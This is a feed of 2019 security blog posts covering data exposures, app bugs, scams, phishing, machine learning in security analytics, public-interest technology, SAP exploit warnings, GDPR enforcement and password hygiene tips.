And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Attention Graphic Designers: It’s Time to Secure Your Canva Credentials appeared first on McAfee Blogs.

Game Golf Exposure Leaves Users in a Sand Trap of Data Concerns

Apps not only provide users with a form of entertainment, but they also help us become more efficient or learn new things. One such app is Game Golf, which comes as a free app, a paid pro version with coaching tools, or with a wearable analyzer. With over 50,000 downloads on Google Play, the app helps golfers track their on-course performance and use the data to help improve their game. Unfortunately, millions of golfer records from the Game Golf app were recently exposed to anyone with an internet connection, thanks to a cloud database lacking password protection.

According to researchers, this exposure consisted of millions of records, including details on 134 million rounds of golf, 4.9 million user notifications, and 19.2 million records in an activity feed folder. Additionally, the database contained profile data like usernames, hashed passwords, emails, gender, Facebook IDs, and authorization tokens. The database also contained network information for the company behind the Game Golf app, Game Your Game Inc., including IP addresses, ports, pathways, and storage information that cybercrooks could potentially exploit to further access the network. A combination of all of this data could theoretically provide cybercriminals with more information on the user, creating greater privacy concerns. Thankfully, the database was secured about two weeks after the company was initially notified of the exposure.

Although it is still unclear as to whether cybercriminals took a swing at this data, the magnitude of the information exposed by the app is cause for concern. Luckily, users can follow these tips to help safeguard their data:

  • Change your passwords. If a cybercriminal got a hold of the exposed data, they could easily gain access into other online accounts if your login credentials were the same across different platforms. Err on the side of caution and change your passwords to something strong and unique for each account.
  • Check to see if you’ve been affected. If you’ve used the Game Golf app and believe your data might have been exposed, use this tool to check or set an alert to be notified of other potential exposures.
  • Secure your online profiles. Use a security solution like McAfee Safe Connect to encrypt your online activity, help protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Game Golf Exposure Leaves Users in a Sand Trap of Data Concerns appeared first on McAfee Blogs.

3 Things You Need to Know About Summer Cybersecurity

summer screen time

The summer season is quickly approaching. Users will take to the skies, roads, and oceans to travel throughout the world for a fun family adventure. But just because users take time off doesn’t mean that their security should. So, with the season’s arrival, we decided to conduct a survey so to better understand users’ cybersecurity needs, as well as help them leave their cybersecurity woes behind while having some fun in the sun. That’s why we asked our users what they are most concerned about during the summer, so we can help them protect what really matters. Let’s see what they had to say.

Sharing the Fun

When it comes to vacations, we’re constantly taking and sharing snaps of amazing memories. What we don’t plan on sharing is the metadata embedded in each photo that can give away more than we intended. In fact, from our research we found that people are 3x more likely to be concerned about their Social Security number being hacked than their photos. Given the risk a compromised SSN poses for the potential of identity theft, it’s no surprise that respondents were more concerned about it. However, to keep the summer fun secure, it’s also important to keep travel photos private and only share securely.

Flying Safely and Securely

From a young age, we have been taught to keep our Social Security number close to the chest, and this is evident in how we protect SSNs. As a matter of fact, 88% of people would be seriously worried if their Social Security number was hacked. The best way to keep a Social Security number secure this summer – don’t share it when purchasing plane tickets or managing travel reservations. All you need to provide is a credit card and passport.

Making Smartphone Security #1  

While on the go, travelers are often keenly aware of how exposed they are physically when carrying around credit cards, passports, suitcases, gadgets and more. However, they also need to think about securing their digital life, particularly their handheld devices. To keep personal photos protected while traveling this summer season, smartphone security must be a top priority. With nearly 40% of respondents concerned about sensitive personal photos being hacked, jet setters need to be proactive about security, not reactive. In fact, we’re reminded of just how important this fact is as we enter the month of June, Internet Safety Month. Just like your laptop or router, it’s vital to protect the personal data stored within a smartphone.

In order to help you stay secure this season, let’s put your travel security knowledge to the test.

Note: There is a widget embedded within this post, please visit the site to participate in this post's widget.

The post 3 Things You Need to Know About Summer Cybersecurity appeared first on McAfee Blogs.

3 Tips for Protecting Against the New WhatsApp Bug

Messaging apps are a common form of digital communication these days, with Facebook’s WhatsApp being one of the most popular options out there. The communication platform boasts over 1.5 billion users – who now need to immediately update the app due to a new security threat. In fact, WhatsApp just announced a recently discovered security vulnerability that exposes both iOS and Android devices to malicious spyware.

So, how does this cyberthreat work, exactly? Leveraging the new WhatsApp bug, hackers first begin the scheme by calling an innocent user via the app. Regardless of whether the user picks up or not, the attacker can use that phone call to infect the device with malicious spyware. From there, crooks can potentially snoop around the user’s device, likely without the victim’s knowledge.

Fortunately, WhatsApp has already issued a patch that solves for the problem – which means users will fix the bug if they update their app immediately. But that doesn’t mean users shouldn’t still keep security top of mind now and in the future when it comes to messaging apps and the crucial data they contain. With that said, here are a few security steps to follow:

  • Flip on automatic updates. No matter the type of application or platform, it’s always crucial to keep your software up-to-date, as fixes for vulnerabilities are usually included in each new version. Turning on automatic updates will ensure that you are always equipped with the latest security patches.
  • Be selective about what information you share. When chatting with fellow users on WhatsApp and other messaging platforms, it’s important you’re always careful of sharing personal data. Never exchange financial information or crucial personal details over the app, as they can possibly be stolen in the chance your device does become compromised with spyware or other malware.
  • Protect your mobile phones from spyware. To help prevent your device from becoming compromised by malicious software, such as this WhatsApp spyware, be sure to add an extra layer of security to it by leveraging a mobile security solution. With McAfee Mobile Security being available for both iOS and Android, devices of all types will remain protected from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 3 Tips for Protecting Against the New WhatsApp Bug appeared first on McAfee Blogs.

The iOS Twitter Bug: 3 Tips to Protect Your Location Data

Many of us use social media to keep our family and friends up-to-date on our everyday lives. We don’t typically expect social media companies to keep their partners updated on our every move as well. But for some Twitter users, this is exactly the situation they’ve found themselves in. On Monday afternoon, the social media company disclosed a bug that resulted in some Twitter users’ locations being shared with an unnamed Twitter partner.

So, how exactly did this bug disclose the locations of certain Twitter users? The social network accidentally sent advertising partners location data for a process called real-time bidding. This process lets advertisers pay for space based on certain users’ locations. Twitter intended to remove the location data from what it sent to its partners but failed to do so. Affected users include those who had more than one Twitter account on an iOS device. If the user chose to share their precise location on one account, Twitter says it may have collected and shared data for the other account on the same mobile device even if that account had opted out of location sharing. Although the location data was “fuzzed” to only show a ZIP code or city, it is still unclear as to how long this location sharing took place.

According to Twitter, the location data was not retained by the partner and they have fixed the problem to ensure that it doesn’t happen again. And while affected users have already been notified by the social network, there are some steps users can take to help protect their data:

  • Turn off location services. While social media is meant for sharing, there is some information, like your location, that ought to be kept private. If a cybercriminal knows where you are at a specific point in time, they could potentially use that information to your disadvantage. Consider your overall privacy and opt out of sharing your location data with social media platforms.
  • Update, update, update. No matter what type of bug might be affecting a certain platform, it’s always crucial to keep your software up-to-date. Turning on automatic updates will ensure that you are always equipped with the latest patches and security fixes.
  • Use a comprehensive security solution. Using a solution like McAfee Total Protection helps to add an extra layer of security in case a bug does expose your device or data.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The iOS Twitter Bug: 3 Tips to Protect Your Location Data appeared first on McAfee Blogs.

Avoid a Security Endgame: Learn About the Latest “Avengers” Scam

Marvel Studio’s $2.2 billion box-office hit “Avengers: Endgame” has quickly risen to the second-highest grossing film of all time in its first two weekends. Not surprisingly, cybercriminals have wasted no time in capitalizing on the movie’s success by luring victims with free digital downloads of the film. How? By tempting users with security shortcuts so they can watch the film without worrying about spoilers or sold-out movie tickets.

When a victim goes to download the movie from one of the many scam sites popping up around the web, the streaming appears to begin automatically. What the user doesn’t know is that the footage being streamed is just from the movie’s trailer. Soon after, a message pops up stating that the user needs to create an account to continue with the download. The “free” account prompts the user to create a username and password in advance, which could potentially be useful for cybercriminals due to the common practice of password reuse. Once a victim creates an account, they are asked for billing information and credit card details in order to “verify location” and make sure the service is “licensed to distribute” the movie in the victim’s region. These crooks are then able to scrape the victim’s personal and financial data, potentially leading to online account hacks, stolen funds, identity theft, and more.

Luckily, Marvel fans can protect their online data to avoid a cybersecurity endgame by using the following tips:

  • Look out for potential scam activity. If it seems too good to be true, then it probably is. Be wary of websites promising free movie downloads, especially for movies that are still in theaters.
  • Shield your financial data. Be suspicious of “free downloads” that still require you to fill out billing information. If an unknown website asks for your credit card information or your bank account data, it’s best to avoid the site altogether.
  • Make sure your credentials are unique. With this scam, threat actors could use the login credentials provided by the victim to access their other accounts if they didn’t have a unique login. Avoiding username and password reuse makes it a lot harder for cybercriminals to hack into your other online accounts if they gain access to one.
  • Assemble a team of comprehensive security tools. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links and will warn you in the event that you do accidentally click on something malicious.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Avoid a Security Endgame: Learn About the Latest “Avengers” Scam appeared first on McAfee Blogs.

Cyber Defense Magazine – May 2019 has arrived. Enjoy it!

Cyber Defense Magazine May 2019 Edition has arrived. We hope you enjoy this month’s editionpacked with over 160+ pages of excellent content.

cyber defense magazine may

Cyber Defense eMagazine for May 2019

cyber defense magazine may 1
cyber defense magazine may 2

Pierluigi Paganini

(SecurityAffairs – Cyber Defense Magazine, hacking)

The post Cyber Defense Magazine – May 2019 has arrived. Enjoy it! appeared first on Security Affairs.

Using the Human Factor in Cyber Attacks

The Human Factor has a fundamental importance for the success of a cyber attack, for this reason it is important to create a culture of cyber security within organizations.

Every day we see a large number of tools being implemented within enterprises and institutions due to the need to keep their environments more secure, along with this implementation of tools comes a series of responsibilities to make resources be used efficiently and effectively, generating the results expected by the Analysts, Managers, and Management. When we speak of a corporate environment there are a number of tools that we can find, such as Web Application Firewall (WAF), Intrusion Prevention Service (IPS), Antispam, Antivirus, Firewall, Web Filter / Application Control, DLP (Data Loss Prevent) Switches, Routers and etc. Each of these tools has its characteristic and function within the corporate environment, being well configured generate results and metrics that help managers make decisions for environment/business growth, security improvement, and others.

In recent years there has been a significant increase in cyber attacks and attempts to exploit vulnerabilities, attackers have increasingly studied CVEs (Common Vulnerabilities and Exposures) based on this knowledge to try to exploit, invade and exfilt data from companies or individuals. When implementing a security tool within a company, it is necessary to pay attention to some points that go beyond the implementation project, some of these points are maintenance and updating of the tool following the good practices of the manufacturer. A very common error that occurs today and makes many companies vulnerable to attacks is that they only care about the tool in the implementation process, after that the points mentioned above that require constant attention during the tool life cycle inside the company are forgotten and make the environment susceptible to attacks and exploitations.

Some points that make environments vulnerable:

  • Old tools.
  • Outdated tools.
  • Poor resource management.
  • Human factor.

From these points mentioned above, I would like to draw attention to the ‘Human Factor’, due to the technological growth, it became fundamental the importance of creating a culture of security policy in the day to day of the collaborators. Companies are investing more and more in lectures, training and workshops to try to reduce an attack or invasion is caused by the human factor, when we speak of human factor can be exemplified as follows: the attacker sends an email with a supposed advertisement or promotion and in it comes a link that will direct the user to this “promotion”, but when in fact it is a malicious link (this attack is called Phishing), the user may be infected with some Malware and from that machine the attacker has internal access and begins to make lateral movements in an attempt to exploit or compromise the company environment. Every day we see research being done by tool makers showing that most of the attacks that occur still have the human factor, that is, a user who is not prepared to identify some simple types of attacks, such as phishing and that can compromise the entire security of the company.

There are currently three most commonly used types of Phishing attacks:

Mass-Scale Phishing: Attack where fraudsters launch an extensive network of attacks that are not highly targeted

Spear Phishing: Tailor-made for a specific victim or group of victims using personal details.

Whaling: A specialized type of spear phishing that targets a “large” victim of a company, for example CEO, CFO or other executive.

Below we have the anatomy of a phishing attack:

human factor

About the author: Zoziel Freire

Cyber Security Analyst Content Writer of the portal: www.infosectrain.com Analyst document’s malicious CompTIA Security Analytics Professional LPIC-3 Enterprise Linux Professionals CompTIA Cybersecurity Analyst Linkedin: https://www.linkedin.com/in/zozielfreire/

Pierluigi Paganini

(SecurityAffairs – Human Factor, cybersecurity)

Twitter: https://twitter.com/zoziel

The post Using the Human Factor in Cyber Attacks appeared first on Security Affairs.

Artificial Intelligence’s Deep Learning, A New Cybersecurity Tool?

Among machine learning developments, deep learning is a major technological breakthrough. With the development of deep learning, programs for enhanced image recognition technology and games including Pokemon Go have come to pass. Advantages in Artificial Intelligence is likely to apply to anti-virus technology as well, rendering the currently anemic signature-based and heuristics-based antimalware obsolete. The reason is the current state of cyber attacks are becoming sophisticated, as the cybercriminals also practice research and development.

For example, the current cyber attack uses malware at a rate of 90% or more, and it is said that some attacks are being launched using malware at a rate of about once every five seconds. In the case of such a method of attack that allowed cybercriminals to break into the system, it was said that it was within one minute. Under such circumstances, conventional malware detection technology lists and detects data on malware characteristics called signatures, which is also limited. If new malware appears, it will not work unless you provide a corresponding signature.

In other words, malware without signatures is not detected, and it can not be detected until new signatures are created and the characteristics of the malware are grasped. But will it evolve quickly and catch up with malware that is customized to your target? It is also pointed out that there are a large amounts of malware that cybercriminals have created to try to evade antivirus. It is an attempt to evade signature-based malware detection by changing the content of the malware a little and creating a large amount of derived malware in order to avoid detection by signatures.

For these reasons, it has been pointed out that detection of malware with conventional antivirus functions has limitations. Therefore, more effective measures are needed, as the world is facing massive accessibility and sharing of information, all of which comes with risks:

Information leakage due to internal fraud

No matter how much security measures are taken with tools and systems, the damage caused by human disasters will not disappear. It is also reported that the staff of the company handling the information illegally uses customer’s personal information. Information to be abused includes credit cards and security codes. If it is the conduct of a trusted corporate employee, the customer has no way to prevent it and it also relates to social trust.

Attack targeting smartphones and smartphone apps

There is an increasing number of cyber attacks aimed at smartphones and smartphone applications. There is also a virus that infects smartphones, and malicious ones that extract information to a seemingly convenient free app have been confirmed. If smartphones used exclusively for business are abused, the damage to the company can be enormous.

Unauthorized use of Internet banking and credit card information

One of the most noticeable personal cyber damage is the removal of information from online banking and credit cards. Account-related information often leaks from virus-infected PCs and smartphone apps. Based on the stolen information, it leads to the result that Internet banking and credit cards are abused.

Damage caused by ransomware

Among cybercrime, the damage caused by ransomware, which is a type of malware, has been a topic in recent years. It is patterned that the PC that has invaded the malware is broken down and the ransom is paid for the information and system restoration. For a company that deals with information, the damage that makes the important information a hostage will be a great loss.

Damage caused by targeted attacks

Targeted attack refers to launching a cyber attack targeting a specific company. As a typical targeted attack, there is a method of sending an email with a virus attached to employees and departments of IT companies that are targeted. Unlike conventional spam emails, they are malicious because they can not be distinguished from regular emails at first glance. Infection with a virus or malware interferes with the operation of the system.

Also, Read:

Artificial Intelligence Makes its Way to Front-line Security

Adopting Artificial Intelligence in Your Business

Vetting of Artificial Intelligence’s Future Use

The Three Core Factors of Artificial Intelligence to Enhance Cybersecurity

Artificial Intelligence as the Next Host of Cyber Attacks, a Cybersecurity Research Firm Revealed

The post Artificial Intelligence’s Deep Learning, A New Cybersecurity Tool? appeared first on .

Cybersecurity for the Public Interest

The Crypto Wars have been waging off-and-on for a quarter-century. On one side is law enforcement, which wants to be able to break encryption, to access devices and communications of terrorists and criminals. On the other are almost every cryptographer and computer security expert, repeatedly explaining that there's no way to provide this capability without also weakening the security of every user of those devices and communications systems.

It's an impassioned debate, acrimonious at times, but there are real technologies that can be brought to bear on the problem: key-escrow technologies, code obfuscation technologies, and backdoors with different properties. Pervasive surveillance capitalism­ -- as practiced by the Internet companies that are already spying on everyone -- ­matters. So does society's underlying security needs. There is a security benefit to giving access to law enforcement, even though it would inevitably and invariably also give that access to others. However, there is also a security benefit of having these systems protected from all attackers, including law enforcement. These benefits are mutually exclusive. Which is more important, and to what degree?

The problem is that almost no policymakers are discussing this policy issue from a technologically informed perspective, and very few technologists truly understand the policy contours of the debate. The result is both sides consistently talking past each other, and policy proposals­ -- that occasionally become law­ -- that are technological disasters.

This isn't sustainable, either for this issue or any of the other policy issues surrounding Internet security. We need policymakers who understand technology, but we also need cybersecurity technologists who understand -- ­and are involved in -- ­policy. We need public-interest technologists.

Let's pause at that term. The Ford Foundation defines public-interest technologists as "technology practitioners who focus on social justice, the common good, and/or the public interest." A group of academics recently wrote that public-interest technologists are people who "study the application of technology expertise to advance the public interest, generate public benefits, or promote the public good." Tim Berners-Lee has called them "philosophical engineers." I think of public-interest technologists as people who combine their technological expertise with a public-interest focus: by working on tech policy, by working on a tech project with a public benefit, or by working as a traditional technologist for an organization with a public benefit. Maybe it's not the best term­ -- and I know not everyone likes it­ -- but it's a decent umbrella term that can encompass all these roles.

We need public-interest technologists in policy discussions. We need them on congressional staff, in federal agencies, at non-governmental organizations (NGOs), in academia, inside companies, and as part of the press. In our field, we need them to get involved in not only the Crypto Wars, but everywhere cybersecurity and policy touch each other: the vulnerability equities debate, election security, cryptocurrency policy, Internet of Things safety and security, big data, algorithmic fairness, adversarial machine learning, critical infrastructure, and national security. When you broaden the definition of Internet security, many additional areas fall within the intersection of cybersecurity and policy. Our particular expertise and way of looking at the world is critical for understanding a great many technological issues, such as net neutrality and the regulation of critical infrastructure. I wouldn't want to formulate public policy about artificial intelligence and robotics without a security technologist involved.

Public-interest technology isn't new. Many organizations are working in this area, from older organizations like EFF and EPIC to newer ones like Verified Voting and Access Now. Many academic classes and programs combine technology and public policy. My cybersecurity policy class at the Harvard Kennedy School is just one example. Media startups like The Markup are doing technology-driven journalism. There are even programs and initiatives related to public-interest technology inside for-profit corporations.

This might all seem like a lot, but it's really not. There aren't enough people doing it, there aren't enough people who know it needs to be done, and there aren't enough places to do it. We need to build a world where there is a viable career path for public-interest technologists.

There are many barriers. There's a report titled A Pivotal Moment that includes this quote: "While we cite individual instances of visionary leadership and successful deployment of technology skill for the public interest, there was a consensus that a stubborn cycle of inadequate supply, misarticulated demand, and an inefficient marketplace stymie progress."

That quote speaks to the three places for intervention. One: the supply side. There just isn't enough talent to meet the eventual demand. This is especially acute in cybersecurity, which has a talent problem across the field. Public-interest technologists are a diverse and multidisciplinary group of people. Their backgrounds come from technology, policy, and law. We also need to foster diversity within public-interest technology; the populations using the technology must be represented in the groups that shape the technology. We need a variety of ways for people to engage in this sphere: ways people can do it on the side, for a couple of years between more traditional technology jobs, or as a full-time rewarding career. We need public-interest technology to be part of every core computer-science curriculum, with "clinics" at universities where students can get a taste of public-interest work. We need technology companies to give people sabbaticals to do this work, and then value what they've learned and done.

Two: the demand side. This is our biggest problem right now; not enough organizations understand that they need technologists doing public-interest work. We need jobs to be funded across a wide variety of NGOs. We need staff positions throughout the government: executive, legislative, and judiciary branches. President Obama's US Digital Service should be expanded and replicated; so should Code for America. We need more press organizations that perform this kind of work.

Three: the marketplace. We need job boards, conferences, and skills exchanges­ -- places where people on the supply side can learn about the demand.

Major foundations are starting to provide funding in this space: the Ford and MacArthur Foundations in particular, but others as well.

This problem in our field has an interesting parallel with the field of public-interest law. In the 1960s, there was no such thing as public-interest law. The field was deliberately created, funded by organizations like the Ford Foundation. They financed legal aid clinics at universities, so students could learn housing, discrimination, or immigration law. They funded fellowships at organizations like the ACLU and the NAACP. They created a world where public-interest law is valued, where all the partners at major law firms are expected to have done some public-interest work. Today, when the ACLU advertises for a staff attorney, paying one-third to one-tenth normal salary, it gets hundreds of applicants. Today, 20% of Harvard Law School graduates go into public-interest law, and the school has soul-searching seminars because that percentage is so low. Meanwhile, the percentage of computer-science graduates going into public-interest work is basically zero.

This is bigger than computer security. Technology now permeates society in a way it didn't just a couple of decades ago, and governments move too slowly to take this into account. That means technologists now are relevant to all sorts of areas that they had no traditional connection to: climate change, food safety, future of work, public health, bioengineering.

More generally, technologists need to understand the policy ramifications of their work. There's a pervasive myth in Silicon Valley that technology is politically neutral. It's not, and I hope most people reading this today knows that. We built a world where programmers felt they had an inherent right to code the world as they saw fit. We were allowed to do this because, until recently, it didn't matter. Now, too many issues are being decided in an unregulated capitalist environment where significant social costs are too often not taken into account.

This is where the core issues of society lie. The defining political question of the 20th century was: "What should be governed by the state, and what should be governed by the market?" This defined the difference between East and West, and the difference between political parties within countries. The defining political question of the first half of the 21st century is: "How much of our lives should be governed by technology, and under what terms?" In the last century, economists drove public policy. In this century, it will be technologists.

The future is coming faster than our current set of policy tools can deal with. The only way to fix this is to develop a new set of policy tools with the help of technologists. We need to be in all aspects of public-interest work, from informing policy to creating tools all building the future. The world needs all of our help.

This essay previously appeared in the January/February 2019 issue of IEEE Security & Privacy. I maintain a public-interest tech resources page here.

Cybercriminals thriving on companies overlooking fundamental security requirements

IT leaders in the United States are putting business data at risk by not effectively managing employees’ passwords, according to OneLogin research. Despite the fact that 91% report they have company guidelines in place around password complexity, and 92% believe their current password protection measures and guidelines provide adequate protection for their business, the results suggest there is still a lot of work to be done. OneLogin surveyed 300 IT decision makers across the U.S. … More

The post Cybercriminals thriving on companies overlooking fundamental security requirements appeared first on Help Net Security.

60% of businesses have experienced a serious security breach in the last two years

There is an increase in security breaches and businesses still face challenges surrounding cyberattacks due to lack of IT security and operations basics. With digital transformation on the rise and technology massively outpacing policy, companies must take the lead when it comes to securing their estates. While cybersecurity has received much fanfare – with global spend predicted to exceed $1 trillion through 2021 – the biggest gaps continue to endure in plain sight. Vanson Bourne … More

The post 60% of businesses have experienced a serious security breach in the last two years appeared first on Help Net Security.

The State of Machine Learning in 2019

Here we are, almost four whole months into 2019 and machine learning and artificial intelligence are still hot topics in the security world. Or at least that was the impression I had. Our 2019 CISO Benchmark Report however, found that between 2018 and 2019, CISO interest in machine learning dropped from 77% to 67%. Similarly, interest in artificial intelligence also dropped from 74% to 66%.

Now there are a number of reasons why these values could have dropped over a year. Maybe there’s a greater lack of certainty or confidence when it comes to implanting ML. Or perhaps widespread adoption and integration into more organizations has made it less of a standout issue for CISOs. Or maybe the market for ML has finally matured to the point where we can start talking about the outcomes from ML and AI and not the tools themselves.

No matter where you stand on ML and AI, there’s still plenty to talk about when it comes to how we as an industry are currently making use of them. With that in mind, I’d like to share some thoughts on ways we need to view machine learning and artificial intelligence as well as how we need to shift the conversation around them.

More effective = less obvious

I’m still amazed by how machine learning is still a hot topic. That’s not to say it does not deserve to be an area of interest though. I am saying however, that what we should be talking about are the outcomes and capabilities it delivers. Some of you may remember when XML was such a big deal, and everyone could not stop talking about it. Fast forward to today and no one advertises that they use XML since that would just be obvious and users care more about the functionality it enables. Machine Learning will follow along the same path. In time, it will become an essential aspect of the way we approach security and become simply another background process. Once that happens, we can focus on talking about the analytical outcomes it enables.

An ensemble cast featuring machine learning

Anyone who has built an effective security analytics pipeline knows that job one is to ensure that it is resilient to active evasion. Threat actors know as much or more than you do about the detection methods within the environments they wish to penetrate and persist. The job of security analytics is to find the most stealthy and evasive threat actor activity in the network and to do this, you cannot just rely on a single technique. In order for that detection to happen, you need a diverse set of techniques all of which complement one another. While a threat actor will be able to evade one or two of them simultaneously, they don’t stand a chance against hundreds of them! Detection in diversity!

To explain this, I would like to use the analogy of a modern bank vault. Vaults employ a diverse set of detection techniques like motion, thermal, laser arrays, and on some physical dimension, an alarm will be tripped, and the appropriate response will ensue. We do the same in the digital world where machine learning helps us model timing or volumetric aspects of the behavior that are statistically normal and we can signal on outliers. This can be done all the way down at the protocol level where models are deterministic or all the way up to the application or users’ behavior which can sometimes be less deterministic. We have had years to refine these analytical techniques and have published well over 50 papers on the topic in the past 12 years.

The precision and scale of ML

So why then can’t we just keep using lists of bad things and lists of good things? Why do we need machine learning in security analytics and what unique value does it bring us? The first thing I want to say here is that we are not religious about machine learning or AI. To us, it is just another tool in the larger analytics pipeline. In fact, the most helpful analytics comes from using a bit of everything.

If you hand me a list and say, “If you ever see these patterns, let me know about it immediately!” I’m good with that. I can do that all day long and at very high speeds. But what if we are looking for something that cannot be known prior to the list making act? What if what we are looking for cannot be seen but only inferred? The shadows of the objects but never the objects if you will. What if we are not really sure what something is or the role it plays in the larger system (i.e., categorization and classification)? All these questions is where machine learning has contributed a great deal to security analytics. Let’s point to a few examples.

The essence of Encrypted Traffic Analytics

Encryption has made what was observable in the network impossible to observe. You can argue with me on this, but mathematics is not on your side, so let’s just accept the fact that deep packet inspection is a thing of the past. We need a new strategy and that strategy is the power of inference. Encrypted Traffic Analytics is an invention at Cisco whereby we leverage the fact that all encrypted sessions begin unencrypted and that the routers and switches can send us an “Observable Derivative.” This metadata coming from the network is a mathematical shadow of the payloads we cannot inspect directly because it is encrypted. Machine learning helps us train on these observable derivatives so that if its shape and size overtime is the same as some malicious behavior, we can bring this to your attention all without having to deal with decryption.

Why is this printer browsing Netflix?

Sometimes we are lucky enough to know the identity and role of a user, application, or device as it interacts with systems across the network. The reality is, most days we are far from 100% on this, so machine learning can help us cluster network activity to make an assertion like, “based on the behavior and interactions of this thing, we can call it a printer!”. When you are dealing with thousands upon thousands of computers interacting with one another across your digital business, even if you had a list at some point in time – it is likely not up to date. The value to this labeling is not just so that you have objects with the most accurate labels, but so you can infer suspicious behavior based on its trusted role. For example, if a network device is labeled a printer, it is expected to act like a printer – future behavior can be expected from this device. If one day it starts to browse Netflix or checks out some code from a repository, our software Stealthwatch generates an alert to your attention. With machine learning, you can infer from behavior what something is or if you already know what something is, you can predict its “normal” behavior and flag any behavior “not normal.”

Pattern matching versus behavioral analytics

Lists are great! Hand me a high-fidelity list and I will hand you back high-fidelity alerts generated from that list. Hand me a noisy or low fidelity list and I will hand you back noise. The definition of machine learning by Arthur Samuels in 1959 is “Field of study that gives computers the ability to learn without being explicitly programmed.” In security analytics, we can use it for just this and have analytical processes that implicitly program a list for you given the activity it observes (the telemetry it is presented). Machine learning helps us implicitly put together a list that could not have been known a priori. In security, we complement what we know with what we can infer through negation. A simple example would be “if these are my sanctioned DNS servers and activities, then what is this other thing here?!” Logically, instead of saying something is A (or a member of set A), we are saying not-A but that only is practical if we have already closed off the world to {A, B} – not-A is B if the set is closed. If, however we did not close off the world to a fixed set of members, not-A could be anything in the universe which is not helpful.

Useful info for your day-to-day tasks

I had gone my entire career measuring humans as if they were machines, and not I am measuring humans as humans. We cannot forget that no matter how fancy we get with the data science, if a human in the end will need to understand and possibly act on this information, they ultimately need to understand it. I had gone my entire career thinking that the data science could explain the results and while this is academically accurate, it is not helpful to the person who needs to understand the analytical outcome. The sense-making of the data is square in the domain of human understanding and this is why the only question we want to ask is “Was this alert helpful?” Yes or no. And that’s exactly what we do with Stealthwatch. At the end of the day, we want to make sure that the person behind the console understands why an alert was triggered and if that helped them. If the “yeses” we’ve received scoring in the mid 90%’s quarter after quarter is any indication, then we’ve been able to help a lot of users make sense of the alerts they’re receiving and use their time more efficiently.

Conclusion

We owe a big round of applause to artificial intelligence for birthing the child we know, and love named machine learning and all that it has contributed to security analytics over the past year. We remain pragmatic in its application as we know that, just because it is the new kid on the block, we cannot turn our backs on simple or complex lists of rules, simple statistical analysis, and any other method that has got us to where we are today.

Lucky for us, machine learning has already shown signs of playing well with its peers as we continue to find ways to improve existing security processes through pairing them with ML. It can’t solve every single problem on its own, but when it works together with the people and processes that have come before it, we get that much closer to a more secure future. And if Machine Learning is the child of AI, who then are its brothers and sisters that we have yet to explore in Security Analytics? We have some big ideas and some already in prototype state, but remember, in the end, we will ask you if it is helpful or not helpful, not all the data science mumbo jumbo!

As always, we welcome your comments below. Readers who enjoyed this blog would also benefit from viewing our library of recent Cybersecurity Reports or checking out our new Threat of the Month blog series.

50,000 companies running SAP installations open to attack via publicly released exploits

Two exploits publicly released in late April at the OPCDE security conference in Dubai could be leveraged to compromise a great number of SAP implementations, Onapsis has warned. A successful attack would allow remote, unauthenticated attackers to: Perform critical business transaction on SAP systems (modify purchase orders, bypassing automatic business controls, etc.) Compromise and extract critical business information Delete all business application data Delete traces of their actions Shut the system down. “This risk to … More

The post 50,000 companies running SAP installations open to attack via publicly released exploits appeared first on Help Net Security.

Why Isn’t GDPR Being Enforced?

Politico has a long article making the case that the lead GDPR regulator, Ireland, has too cozy a relationship with Silicon Valley tech companies to effectively regulate their privacy practices.

Despite its vows to beef up its threadbare regulatory apparatus, Ireland has a long history of catering to the very companies it is supposed to oversee, having wooed top Silicon Valley firms to the Emerald Isle with promises of low taxes, open access to top officials, and help securing funds to build glittering new headquarters.

Now, data-privacy experts and regulators in other countries alike are questioning Ireland's commitment to policing imminent privacy concerns like Facebook's reintroduction of facial recognition software and data sharing with its recently purchased subsidiary WhatsApp, and Google's sharing of information across its burgeoning number of platforms.

Protect Your Digital Life: Why Strong Passwords Matter

Over the years, our lives have become more and more digital. Think about it: 20 years ago, no one was using banking apps and social media had just barely begun coming to fruition. Now, many of us are reliant on mobile banking to pay our bills and we check our favorite social media platforms multiple times a day. Our lives exist almost entirely online with our sensitive personal data shielded by password protection — from our financials to our official documentation, personal photos and more. With so much of our personal data relying on the strength of our online passwords, it’s vital that users stay up-to-date on the latest password security practices. As we take the time to recognize World Password Day, it’s important to think about why passwords matter and how you’re safeguarding your personal information online.

 

 

Think about all of the online data you have that is password protected: your email, your social media accounts, your online banking profile, your movie and TV streaming service, the list goes on and on. If you aren’t following best practices for password security and just one of your passwords is exposed or breached, this could potentially lead to cybersecurity turmoil. For example, an Android app that helped users find and connect to free Wi-Fi hotspots recently left its database of more than 2 million network passwords exposed. While the app claimed to only share public hotspots, many were found to be home wireless networks thanks to the precise GPS location data that was also stored in the database. Now imagine that one of the victims of this password exposure utilized the same credentials for their online banking profile. If their password ended up in the wrong hands, a cybercriminal could potentially access the user’s financial data, leading to fraudulent charges or even identity theft. As you can see, creating a strong and unique password could mean the difference between keeping your online data safe and being at risk of a cyberattack.

Many people just go through the motions when creating passwords instead of taking the time to consider what exactly their credentials are protecting. World Password Day is the perfect opportunity to be diligent about revamping passwords. Check out the following tips to take your password security to the next level:

  • See if your passwords have been exposed. Go to a site such as HaveiBeenPwned to see if your password(s) have been compromised in a breach. Change them if you find that your credentials may have been jeopardized.
  • Layer up your passwords. Passwords should always contain a variety of capital and lowercase letters, numbers, and symbols. Today, many systems enforce password requirements during the account set-up process to ensure password strength.
  • Choose unique passwords across all of your accounts. Many consumers utilize the same password, or variations of it, across all of their accounts. This means if a hacker discovers just one password, all personal data is suddenly at risk. Therefore, it is crucial to diversify your passcodes to ensure hackers cannot obtain access to all of your accounts at once, should one password be compromised.
